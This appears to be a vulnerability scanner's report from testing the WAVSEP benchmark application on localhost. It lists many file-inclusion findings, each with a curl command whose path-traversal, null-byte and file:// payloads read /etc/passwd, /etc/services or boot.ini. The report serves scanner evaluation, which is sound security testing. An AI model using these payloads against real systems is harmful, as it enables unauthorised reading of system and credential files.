Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case42-LFI-FileClass-FilenameContext-WindowsTraversalValidation-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case43-LFI-FileClass-FilenameContext-UnixTraversalValidation-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

